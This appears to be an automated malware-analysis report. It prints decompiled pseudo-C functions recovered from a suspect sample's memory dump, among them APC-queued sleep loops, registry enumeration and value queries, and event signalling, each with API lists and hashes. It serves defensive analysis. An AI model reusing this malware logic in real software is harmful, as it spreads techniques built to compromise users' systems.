                            • Instruction ID: 650b7bcafe3fa4cb26d1b6f358d2ef2b92cea4fc52499ea1855fa5dabeb84b24
                            • Opcode Fuzzy Hash: cd3b7ae6289d0fb6640c94f609b1a8fb474f3599b086b501a40a75b020f38cec
                            • Instruction Fuzzy Hash: 29214672E413559BC7319F689C44ADB73A9EBC8730B160224FD16D7100DB75EC81A6D4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E00F12EBD(void* __ecx, void* __edi, intOrPtr _a4) {
                            				unsigned int _v8;
                            				void* _v12;
                            				long _t15;
                            				long _t16;
                            				signed int _t18;
                            				signed int _t19;
                            				unsigned int _t21;
                            				unsigned int _t26;
                            
                            				asm("stosd");
                            				_v12 = _v12 | 0xffffffff;
                            				while(1) {
                            					_t15 = QueueUserAPC(E00F1293E, GetCurrentThread(),  &_v12); // executed
                            					if(_t15 == 0) {
                            						break;
                            					}
                            					_t26 = _v8;
                            					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
                            					_push(0);
                            					_push(0x13);
                            					_push(_t26 >> 5);
                            					_push(_t18);
                            					L00F1B18E();
                            					_push(1);
                            					_t19 = 3;
                            					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
                            					_t16 = E00F154DF(_a4, (_t21 >> 6) + _t18);
                            					if(_t16 == 1) {
                            						continue;
                            					} else {
                            					}
                            					L5:
                            					return _t16;
                            				}
                            				_t16 = GetLastError();
                            				goto L5;
                            			}
                            0x00f12ec8
                            0x00f12ec9
                            0x00f12ecf
                            0x00f12edf
                            0x00f12ee7
                            0x00000000
                            0x00000000
                            0x00f12eec
                            0x00f12eef
                            0x00f12ef3
                            0x00f12ef5
                            0x00f12efa
                            0x00f12efb
                            0x00f12efc
                            0x00f12f03
                            0x00f12f09
                            0x00f12f10
                            0x00f12f1f
                            0x00f12f27
                            0x00000000
                            0x00000000
                            0x00f12f29
                            0x00f12f31
                            0x00f12f33
                            0x00f12f33
                            0x00f12f2b
                            0x00000000

                            APIs
                            • GetCurrentThread.KERNEL32 ref: 00F12ED3
                            • QueueUserAPC.KERNEL32(00F1293E,00000000,?,?,?,00F12348,?,?), ref: 00F12EDF
                            • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 00F12EFC
                            • SleepEx.KERNEL32(00000003,00000001,?,?,?,00F12348,?,?), ref: 00F12F10
                              • Part of subcall function 00F154DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 00F1553E
                            • GetLastError.KERNEL32(?,?,?,00F12348,?,?), ref: 00F12F2B
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                            • String ID:
                            • API String ID: 2952296216-0
                            • Opcode ID: 124c982a506e2bf677afe143a78381f8ab078fb7a62c295a54e57e52073792a2
                            • Instruction ID: b267f859263ceec398272970fda82118b478bd7b048d65c53ad97b9e424ac6ab
                            • Opcode Fuzzy Hash: 124c982a506e2bf677afe143a78381f8ab078fb7a62c295a54e57e52073792a2
                            • Instruction Fuzzy Hash: 7801DBB2A40108FBD7149BE4DC5EFEE767CD744760F114114F602D61C0E6B0DA41E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00F14788(void* __eax) {
                            				long _v8;
                            				char _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				void* _v24;
                            				void* __esi;
                            				void* _t41;
                            				char* _t42;
                            				long _t43;
                            				void* _t46;
                            				intOrPtr _t47;
                            				intOrPtr* _t48;
                            				char _t50;
                            				long _t54;
                            				char* _t55;
                            				long _t56;
                            				intOrPtr* _t57;
                            				void* _t60;
                            				void* _t61;
                            				void* _t68;
                            				void* _t72;
                            				void* _t73;
                            				void* _t74;
                            				void* _t78;
                            
                            				_t72 = __eax;
                            				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                            					L2:
                            					_t41 = _t72;
                            					_pop(_t73);
                            					_t74 = _t41;
                            					_t42 =  &_v12;
                            					_v8 = 0;
                            					_v16 = 0;
                            					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                            					if(_t42 == 0) {
                            						_t43 = GetLastError();
                            						_v8 = _t43;
                            						if(_t43 == 0x2efe) {
                            							_v8 = 0;
                            							goto L29;
                            						}
                            					} else {
                            						if(_v12 == 0) {
                            							L29:
                            							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                            						} else {
                            							_t46 =  *0xf1d130(0, 1,  &_v24); // executed
                            							if(_t46 != 0) {
                            								_v8 = 8;
                            							} else {
                            								_t47 = E00F155DC(0x1000);
                            								_v20 = _t47;
                            								if(_t47 == 0) {
                            									_v8 = 8;
                            								} else {
                            									goto L8;
                            									do {
                            										while(1) {
                            											L8:
                            											_t50 = _v12;
                            											if(_t50 >= 0x1000) {
                            												_t50 = 0x1000;
                            											}
                            											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                            											if(_t50 == 0) {
                            												break;
                            											}
                            											_t57 = _v24;
                            											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                            											_t18 =  &_v12;
                            											 *_t18 = _v12 - _v16;
                            											if( *_t18 != 0) {
                            												continue;
                            											} else {
                            											}
                            											L14:
                            											if(WaitForSingleObject( *0xf1d2a4, 0) != 0x102) {
                            												_v8 = 0x102;
                            											} else {
                            												_t55 =  &_v12;
                            												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                            												if(_t55 != 0) {
                            													goto L19;
                            												} else {
                            													_t56 = GetLastError();
                            													_v8 = _t56;
                            													if(_t56 == 0x2f78 && _v12 == 0) {
                            														_v8 = 0;
                            														goto L19;
                            													}
                            												}
                            											}
                            											L22:
                            											E00F16DFA(_v20);
                            											if(_v8 == 0) {
                            												_t54 = E00F144E4(_v24, _t74); // executed
                            												_v8 = _t54;
                            											}
                            											goto L25;
                            										}
                            										_v8 = GetLastError();
                            										goto L14;
                            										L19:
                            									} while (_v12 != 0);
                            									goto L22;
                            								}
                            								L25:
                            								_t48 = _v24;
                            								 *((intOrPtr*)( *_t48 + 8))(_t48);
                            							}
                            						}
                            					}
                            					return _v8;
                            				} else {
                            					_t60 = E00F1301A(__eax); // executed
                            					if(_t60 != 0) {
                            						return _t60;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75145520,00F1654E,?,?), ref: 00F18AB7
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,75145520,00F1654E,?,?,?), ref: 00F18AD7
                              • Part of subcall function 00F1301A: wcstombs.NTDLL ref: 00F130DA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ErrorLastObjectSingleWaitwcstombs
                            • String ID:
                            • API String ID: 2344289193-0
                            • Opcode ID: 23fe5e130bdc08a8ae8396112eea8b48b579c6ec0731b894b54761e6b086554d
                            • Instruction ID: 9449de4d337f3681b34d3d9c222a8fe26b03842498d7ea3743958a56d8b133c2
                            • Opcode Fuzzy Hash: 23fe5e130bdc08a8ae8396112eea8b48b579c6ec0731b894b54761e6b086554d
                            • Instruction Fuzzy Hash: A341F9B1D00209EFDF10DFA5DA845EEBBB9FF58395B20846AE502E7150DB349E81AB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 00F16AA4
                            • SysAllocString.OLEAUT32(00F14993), ref: 00F16AE7
                            • SysFreeString.OLEAUT32(00000000), ref: 00F16AFB
                            • SysFreeString.OLEAUT32(00000000), ref: 00F16B09
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: af038af15557a1d9d8a33792e9a1f136b167255e0e984368fe94c7e7fc5039bb
                            • Instruction ID: 454f0fd92153d80296cafe8602b4759d2dcc840bf83adedd83435d91367df187
                            • Opcode Fuzzy Hash: af038af15557a1d9d8a33792e9a1f136b167255e0e984368fe94c7e7fc5039bb
                            • Instruction Fuzzy Hash: 1E310C72904149EFCB05DF98D8C48EEBBB9FF48350B11842EE90AE7210D7759985DFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F1A614(void* __ecx, intOrPtr _a4) {
                            				int* _v8;
                            				int _v12;
                            				int* _v16;
                            				int _v20;
                            				int* _v24;
                            				char* _v28;
                            				void* _v32;
                            				long _t33;
                            				char* _t35;
                            				long _t39;
                            				long _t42;
                            				intOrPtr _t47;
                            				void* _t51;
                            				long _t53;
                            
                            				_t51 = __ecx;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v24 = 0;
                            				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                            				_t53 = _t33;
                            				if(_t53 != 0) {
                            					L18:
                            					return _t53;
                            				}
                            				_t53 = 8;
                            				_t35 = E00F155DC(0x104);
                            				_v28 = _t35;
                            				if(_t35 == 0) {
                            					L17:
                            					RegCloseKey(_v32);
                            					goto L18;
                            				}
                            				_v20 = 0x104;
                            				do {
                            					_v16 = _v20;
                            					_v12 = 0x104;
                            					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                            					_t53 = _t39;
                            					if(_t53 != 0xea) {
                            						if(_t53 != 0) {
                            							L14:
                            							if(_t53 == 0x103) {
                            								_t53 = 0;
                            							}
                            							L16:
                            							E00F16DFA(_v28);
                            							goto L17;
                            						}
                            						_t42 = E00F148E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                            						_t53 = _t42;
                            						if(_t53 != 0) {
                            							goto L14;
                            						}
                            						goto L12;
                            					}
                            					if(_v12 <= 0x104) {
                            						if(_v16 <= _v20) {
                            							goto L16;
                            						}
                            						E00F16DFA(_v24);
                            						_v20 = _v16;
                            						_t47 = E00F155DC(_v16);
                            						_v24 = _t47;
                            						if(_t47 != 0) {
                            							L6:
                            							_t53 = 0;
                            							goto L12;
                            						}
                            						_t53 = 8;
                            						goto L16;
                            					}
                            					_v8 = _v8 + 1;
                            					goto L6;
                            					L12:
                            				} while (WaitForSingleObject( *0xf1d2a4, 0) == 0x102);
                            				goto L16;
                            			}

                            APIs
                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A63A
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • RegEnumKeyExA.KERNEL32(?,?,?,00F16096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F16096), ref: 00F1A681
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,00F16096,?,00F16096,?,?,?,?,?,00F16096,?), ref: 00F1A6EE
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A716
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID:
                            • API String ID: 3664505660-0
                            • Opcode ID: a567d226bd86ec7e37ed5c8fcf431926c6e7bc5adff05622ab4b21488fec7bf9
                            • Instruction ID: 22641f0926057ce644404695a0d408d835d72fd9199b00182233d90bd63271e4
                            • Opcode Fuzzy Hash: a567d226bd86ec7e37ed5c8fcf431926c6e7bc5adff05622ab4b21488fec7bf9
                            • Instruction Fuzzy Hash: 08313872C00119EBCF21AFA5DC849EEFBB9FB98310F204066E911B2160D6754E91EB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E00F16006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                            				intOrPtr _v12;
                            				void* _v16;
                            				void* _v28;
                            				char _v32;
                            				void* __esi;
                            				void* _t20;
                            				void* _t26;
                            				void* _t29;
                            				void* _t38;
                            				signed int* _t39;
                            				void* _t40;
                            
                            				_t36 = __ecx;
                            				_v32 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v12 = _a4;
                            				_t20 = E00F12E2E(__ecx,  &_v32); // executed
                            				_t38 = _t20;
                            				if(_t38 != 0) {
                            					L12:
                            					_t39 = _a8;
                            					L13:
                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                            						_t23 =  &(_t39[1]);
                            						if(_t39[1] != 0) {
                            							E00F1A2A1(_t23);
                            						}
                            					}
                            					return _t38;
                            				}
                            				_t26 = E00F15EF5(0x40,  &_v16); // executed
                            				if(_t26 != 0) {
                            					_v16 = 0;
                            				}
                            				_t40 = CreateEventA(0xf1d2e4, 1, 0,  *0xf1d374);
                            				if(_t40 != 0) {
                            					SetEvent(_t40);
                            					Sleep(0xbb8); // executed
                            					CloseHandle(_t40);
                            				}
                            				_push( &_v32);
                            				if(_a12 == 0) {
                            					_t29 = E00F1A614(_t36); // executed
                            				} else {
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t29 = E00F148E5(_t36);
                            				}
                            				_t41 = _v16;
                            				_t38 = _t29;
                            				if(_v16 != 0) {
                            					E00F17424(_t41);
                            				}
                            				if(_t38 != 0) {
                            					goto L12;
                            				} else {
                            					_t39 = _a8;
                            					_t38 = E00F14B5B( &_v32, _t39);
                            					goto L13;
                            				}
                            			}

                            APIs
                            • CreateEventA.KERNEL32(00F1D2E4,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 00F16057
                            • SetEvent.KERNEL32(00000000), ref: 00F16064
                            • Sleep.KERNEL32(00000BB8), ref: 00F1606F
                            • CloseHandle.KERNEL32(00000000), ref: 00F16076
                              • Part of subcall function 00F1A614: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A63A
                              • Part of subcall function 00F1A614: RegEnumKeyExA.KERNEL32(?,?,?,00F16096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F16096), ref: 00F1A681
                              • Part of subcall function 00F1A614: WaitForSingleObject.KERNEL32(00000000,?,?,?,00F16096,?,00F16096,?,?,?,?,?,00F16096,?), ref: 00F1A6EE
                              • Part of subcall function 00F1A614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A716
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 891522397-0
                            • Opcode ID: 2e884472c5725051ce10bf82c9b798314dca4a8b1b21a50d61fdc665b4c76c72
                            • Instruction ID: 8f49c17b66312415c14ac3089347da5896018d786b0f35f1d420ad9a5b0099d5
                            • Opcode Fuzzy Hash: 2e884472c5725051ce10bf82c9b798314dca4a8b1b21a50d61fdc665b4c76c72
                            • Instruction Fuzzy Hash: 77219873D00219EBCF20AFE58C858DE7779AB4C360B064529F611E7100D735DD85ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F15607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                            				long _t26;
                            				intOrPtr* _t38;
                            				char* _t42;
                            				long _t43;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                            					_t43 = _t26;
                            					if(_t43 == 0) {
                            						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                            						if(_a4 == 0) {
                            							_t43 = 0xe8;
                            						} else {
                            							_t42 = E00F155DC(_a4);
                            							if(_t42 == 0) {
                            								_t43 = 8;
                            							} else {
                            								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                            								if(_t43 != 0) {
                            									E00F16DFA(_t42);
                            								} else {
                            									 *_a20 = _t42;
                            									_t38 = _a24;
                            									if(_t38 != 0) {
                            										 *_t38 = _a4;
                            									}
                            								}
                            							}
                            						}
                            						RegCloseKey(_a12);
                            					}
                            					L12:
                            					return _t43;
                            				}
                            				_t43 = E00F18FEC(_a4, _a8, _a12, _a16, _a20, _a24);
                            				if(_t43 == 0) {
                            					goto L12;
                            				}
                            				goto L2;
                            			}

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00F15640
                            • RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00000000,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?,80000002), ref: 00F15662
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,80000002,00000000,00000000,00000000,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?), ref: 00F15687
                            • RegCloseKey.ADVAPI32(?,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?,80000002,00000000,?), ref: 00F156B7
                              • Part of subcall function 00F18FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 00F19071
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: 7806968c1103ceff165d0025a678ec4909e46ddf776f87ecbf3a86f5ab5bd5ab
                            • Instruction ID: 8bd01e63e9ec30c046bfa42dbbcf623b2981dc411b30d44071a9ef733a8632cf
                            • Opcode Fuzzy Hash: 7806968c1103ceff165d0025a678ec4909e46ddf776f87ecbf3a86f5ab5bd5ab
                            • Instruction Fuzzy Hash: 6A21F87350055DEFCF11AF94DC80CEE7B6AEB587A0B458026FE159B120D6319DA1ABD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00F13A19(void** __esi) {
                            				intOrPtr _v0;
                            				intOrPtr _t4;
                            				intOrPtr _t6;
                            				void* _t8;
                            				void* _t9;
                            				intOrPtr _t10;
                            				void* _t11;
                            				void** _t13;
                            
                            				_t13 = __esi;
                            				_t4 =  *0xf1d35c; // 0x57f95b0
                            				__imp__(_t4 + 0x40);
                            				while(1) {
                            					_t6 =  *0xf1d35c; // 0x57f95b0
                            					if( *((intOrPtr*)(_t6 + 0x58)) == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t8 =  *_t13;
                            				if(_t8 != 0 && _t8 != 0xf1d030) {
                            					HeapFree( *0xf1d270, 0, _t8);
                            				}
                            				_t9 = E00F1311C(_v0, _t13); // executed
                            				_t13[1] = _t9;
                            				_t10 =  *0xf1d35c; // 0x57f95b0
                            				_t11 = _t10 + 0x40;
                            				__imp__(_t11);
                            				return _t11;
                            			}

                            APIs
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F13A22
                            • Sleep.KERNEL32(0000000A), ref: 00F13A2C
                            • HeapFree.KERNEL32(00000000,?), ref: 00F13A54
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F13A70
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 0c133cc6f990a809986637e8e02a7790d4f079cd4f825a211c1bedf00d74095d
                            • Instruction ID: 470754adde9c66c204b75344bbfd8fe1f13c04275ba172c7e75279787322950c
                            • Opcode Fuzzy Hash: 0c133cc6f990a809986637e8e02a7790d4f079cd4f825a211c1bedf00d74095d
                            • Instruction Fuzzy Hash: C6F05874640248EFEB20CB69EC48BD63BB4AF15340B0AC004F582C6261D634D980FF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 18%
                            			E00F1301A(void* __esi) {
                            				signed int _v8;
                            				long _v12;
                            				char _v16;
                            				long* _v20;
                            				long _t36;
                            				long* _t47;
                            				intOrPtr* _t62;
                            				intOrPtr* _t63;
                            				char* _t64;
                            
                            				_t36 =  *((intOrPtr*)(__esi + 0x28));
                            				_t62 = __esi + 0x2c;
                            				_v16 = 0;
                            				 *_t62 = 0;
                            				_v12 = _t36;
                            				if(_t36 != 0) {
                            					L12:
                            					return _v12;
                            				}
                            				_v8 = 4;
                            				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                            				if(_t36 == 0) {
                            					L11:
                            					_v12 = GetLastError();
                            					goto L12;
                            				}
                            				_push( &_v16);
                            				_push( &_v8);
                            				_push(_t62);
                            				_t63 = __imp__; // 0x6ff6fd20
                            				_push(0);
                            				_push(0x20000013);
                            				_push( *((intOrPtr*)(__esi + 0x18)));
                            				if( *_t63() == 0) {
                            					goto L11;
                            				} else {
                            					_v16 = 0;
                            					_v8 = 0;
                            					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                            					_t47 = E00F155DC(_v8 + 2);
                            					_v20 = _t47;
                            					if(_t47 == 0) {
                            						_v12 = 8;
                            					} else {
                            						_push( &_v16);
                            						_push( &_v8);
                            						_push(_t47);
                            						_push(0);
                            						_push(0x16);
                            						_push( *((intOrPtr*)(__esi + 0x18)));
                            						if( *_t63() == 0) {
                            							_v12 = GetLastError();
                            						} else {
                            							_v8 = _v8 >> 1;
                            							 *((short*)(_v20 + _v8 * 2)) = 0;
                            							_t64 = E00F155DC(_v8 + 1);
                            							if(_t64 == 0) {
                            								_v12 = 8;
                            							} else {
                            								wcstombs(_t64, _v20, _v8 + 1);
                            								 *(__esi + 0xc) = _t64;
                            							}
                            						}
                            						E00F16DFA(_v20);
                            					}
                            					goto L12;
                            				}
                            			}

                            APIs
                            • GetLastError.KERNEL32 ref: 00F1310C
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • wcstombs.NTDLL ref: 00F130DA
                            • GetLastError.KERNEL32 ref: 00F130F0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ErrorLast$AllocateHeapwcstombs
                            • String ID:
                            • API String ID: 2631933831-0
                            • Opcode ID: c1f6c1ecc3b5da90f7b04fd557ef276d9e8b3e10f9a85a7105dc1a607ba8d1f5
                            • Instruction ID: 6942bf2eec4bef9e7240f7337da48b001842576775945d7cf49c6a4c36110a6c
                            • Opcode Fuzzy Hash: c1f6c1ecc3b5da90f7b04fd557ef276d9e8b3e10f9a85a7105dc1a607ba8d1f5
                            • Instruction Fuzzy Hash: E931F9B6D00208FFDB10DFA5CC819EEBBB8EB48344B104569E512E3251DA719B84AF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F14C56(void* __edx) {
                            				void* _v8;
                            				int _v12;
                            				WCHAR* _v16;
                            				void* __edi;
                            				void* __esi;
                            				void* _t23;
                            				intOrPtr _t24;
                            				void* _t26;
                            				intOrPtr _t32;
                            				intOrPtr _t35;
                            				void* _t37;
                            				intOrPtr _t38;
                            				intOrPtr _t42;
                            				void* _t45;
                            				void* _t50;
                            				void* _t52;
                            
                            				_t50 = __edx;
                            				_v12 = 0;
                            				_t23 = E00F15EF5(0,  &_v8); // executed
                            				if(_t23 != 0) {
                            					_v8 = 0;
                            				}
                            				_t24 =  *0xf1d2b8; // 0x48da5a8
                            				_t4 = _t24 + 0xf1ee10; // 0x57f93b8
                            				_t26 = E00F1A415( &_v16, _v8, _t24 + 0xf1edb8, _t4); // executed
                            				_t45 = _t26;
                            				if(_t45 == 0) {
                            					StrToIntExW(_v16, 0,  &_v12);
                            					_t45 = 8;
                            					if(_v12 < _t45) {
                            						_t45 = 1;
                            						__eflags = 1;
                            					} else {
                            						_t32 =  *0xf1d2b8; // 0x48da5a8
                            						_t11 = _t32 + 0xf1ee04; // 0x57f93ac
                            						_t48 = _t11;
                            						_t52 = E00F15434(_t11, _t32 + 0xf1edb8, _t11);
                            						_t59 = _t52;
                            						if(_t52 != 0) {
                            							_t35 =  *0xf1d2b8; // 0x48da5a8
                            							_t37 = E00F13A79(_t48, _t50, _t59, _v8, _t52, _t35 + 0xf1ee4e, 0x14); // executed
                            							if(_t37 == 0) {
                            								_t61 =  *0xf1d294 - 6;
                            								if( *0xf1d294 <= 6) {
                            									_t42 =  *0xf1d2b8; // 0x48da5a8
                            									E00F13A79(_t48, _t50, _t61, _v8, _t52, _t42 + 0xf1ed9a, 0x13);
                            								}
                            							}
                            							_t38 =  *0xf1d2b8; // 0x48da5a8
                            							_t17 = _t38 + 0xf1ee48; // 0x57f93f0
                            							_t45 = E00F14FA0(_v8, 0x80000001, _t52, _t38 + 0xf1ee20, _t17);
                            							HeapFree( *0xf1d270, 0, _t52);
                            						}
                            					}
                            					HeapFree( *0xf1d270, 0, _v16);
                            				}
                            				_t54 = _v8;
                            				if(_v8 != 0) {
                            					E00F17424(_t54);
                            				}
                            				return _t45;
                            			}

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,?,057F93B8,00000000,?,7519F710,00000000,7519F730), ref: 00F14CA5
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,?,057F93F0,?,00000000,?,00000014,?,057F93AC), ref: 00F14D42
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F150D9), ref: 00F14D54
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c4a972b486b6166d9df22151b6994b696e4ac0d1d17f96beb6fec9431122be47
                            • Instruction ID: 79beb518dff8193f3fc3bb248f38ccb3e75a5561ec032a14b8024f1c49d9be20
